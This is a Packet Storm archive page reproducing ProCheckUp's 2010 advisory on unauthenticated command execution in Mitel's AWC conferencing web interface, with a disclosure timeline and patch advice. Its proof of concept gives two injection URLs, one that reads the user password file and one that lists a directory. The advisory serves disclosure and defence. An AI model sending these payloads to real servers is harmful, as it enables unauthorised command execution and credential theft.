what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Mitel's AWC Command Execution

Mitel's AWC Command Execution
Posted Dec 21, 2010
Authored by ProCheckUp, Jan Fry | Site procheckup.com

Mitel's AWC (Mitel Audio and Web Conferencing) suffers from an unauthenticated remote command execution vulnerability.

tags | exploit, remote, web
SHA-256 | d8ebd53382f1971b52183a49644b0acc8ffacacf752faf70fcaba699b9613c61

Mitel's AWC Command Execution

Change Mirror Download
http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-14

PR10-14 Unauthenticated command execution within Mitel's AWC (Mitel
Audio and Web Conferencing)

Advisory publicly released: Tuesday, 21 December 2010
Vulnerability found: Wednesday, 21 July 2010
Vendor informed: Monday, 26 July 2010
Severity level: High/Critical
Credits
Jan Fry of ProCheckUp Ltd (www.procheckup.com)
Description
Mitel Audio and Web Conferencing (AWC) is a simple, cost-effective and
scalable audio and web conferencing solution supporting upto 200 ports.
http://www.mitel.com/DocController?documentId=26451
ProCheckUp has discovered that the AWC web user interface is vulnerable
to an unauthenticated command execution attack.
Proof of concept
The following demonstrate the command execution flaw:

1) Vulnerable to command execution

To read the user password file
http://target-domain.foo/awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26cat%20%22/usr/awc/www/users%22%26


To perform a directory listing
http://target-domain.foo/awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26ls%20%22/usr/awc/www/cgi-bin/%22%26


Consequences:
Command execution allows Unix commands to be remotely executed with the
permissions associated with the web service account. No authentication
is required to exploit this vulnerability.
How to fix
Ensure that the latest patches have been installed.
References


Legal
Copyright 2010 ProCheckUp Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if, the Bulletin is not edited or changed in any way, is attributed
to Procheckup, and provided such reproduction and/or distribution is
performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not
liable for any misuse of this information by any third party.

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close